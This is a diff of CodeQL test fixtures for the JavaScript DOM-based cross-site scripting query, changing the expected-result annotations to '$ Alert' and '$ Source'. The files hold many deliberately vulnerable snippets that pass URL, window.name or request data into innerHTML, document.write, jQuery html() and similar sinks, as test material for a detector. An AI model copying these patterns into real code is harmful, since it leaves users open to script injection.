100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js @@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

    A link

    '; // NOT OK + this.parentNode.innerHTML = '

    A link

    '; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,38 +1,38 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
    "); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
    "); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,10 +4,9 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js @@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,46 +1,46 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -2,18 +2,18 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <>
    ) @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + let tainted = req.param("code"); // $ Source + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
    ) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,33 +1,33 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); - return
    ; // NOT OK + let [state, setState] = useState(window.name); // $ Source + return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); - return
    ; // NOT OK + setState(window.name); // $ Source + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); - return
    ; // NOT OK + setState(() => window.name); // $ Source + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
    ; // OK + return
    ; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,37 +13,37 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -1,30 +1,30 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\nfoobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n    ' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..d20f88dba398 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js @@ -1,12 +1,12 @@ -document.write(document.location.href.charCodeAt(0)); // OK +document.write(document.location.href.charCodeAt(0)); -document.write(document.location); // NOT OK -document.write(document.location.href); // NOT OK -document.write(document.location.href.valueOf()); // NOT OK -document.write(document.location.href.sup()); // NOT OK -document.write(document.location.href.toUpperCase()); // NOT OK -document.write(document.location.href.trimLeft()); // NOT OK -document.write(String.fromCharCode(document.location.href)); // NOT OK -document.write(String(document.location.href)); // NOT OK -document.write(escape(document.location.href)); // OK (for now) -document.write(escape(escape(escape(document.location.href)))); // OK (for now) +document.write(document.location); // $ Alert +document.write(document.location.href); // $ Alert +document.write(document.location.href.valueOf()); // $ Alert +document.write(document.location.href.sup()); // $ Alert +document.write(document.location.href.toUpperCase()); // $ Alert +document.write(document.location.href.trimLeft()); // $ Alert +document.write(String.fromCharCode(document.location.href)); // $ Alert +document.write(String(document.location.href)); // $ Alert +document.write(escape(document.location.href)); // OK - for now +document.write(escape(escape(escape(document.location.href)))); // OK - for now diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a1feef0267a0..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -2,12 +2,12 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..7675513734da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,22 +3,22 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return - // OK - // OK - // NOT OK - // NOT OK + + + { /* $ Alert */ } + { /* $ Alert */ } } function MyElement(props) { const provide = props.provide; - return
    ; // NOT OK + return
    ; // $ Alert } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,10 +3,9 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js index 75137f7de5ce..61a272dffe1a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js @@ -1,3 +1,3 @@ export function createHtml(x) { - return x; + return x; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,13 +1,13 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK -policy1.createHTML(window.name); +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert +policy1.createHTML(window.name); // $ Source -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..a92e6e954909 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,172 +1,156 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
    '); + $('
    '); // $ Alert - $('
    '); // OK - $('
    '); // OK + $('
    '); + $('
    '); - let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + let params = (new URL(document.location)).searchParams; // $ Source + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
    " + s + "
    "; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - $sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
    ').html(document.location.search); // NOT OK - angular.element('
    ').html('SAFE'); // OK + angular.element('
    ').html(document.location.search); // $ Alert + angular.element('
    ').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ - return function(v){ $("
    ").html(v); } // NOT OK + return function(v){ $("
    ").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
    ").html(xssSourceService()); // NOT OK + $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
    ").html(v); } // OK + return function(v){ $("
    ").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
    ").html(innocentSourceService()); // OK + $("
    ").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -174,30 +158,30 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { @@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + $('myId').html(prevProps.tainted4) // $ Alert }); } } @@ -248,7 +232,7 @@ function react(){ } render() { - return ; + return ; // $ Alert } } @@ -256,36 +240,36 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + 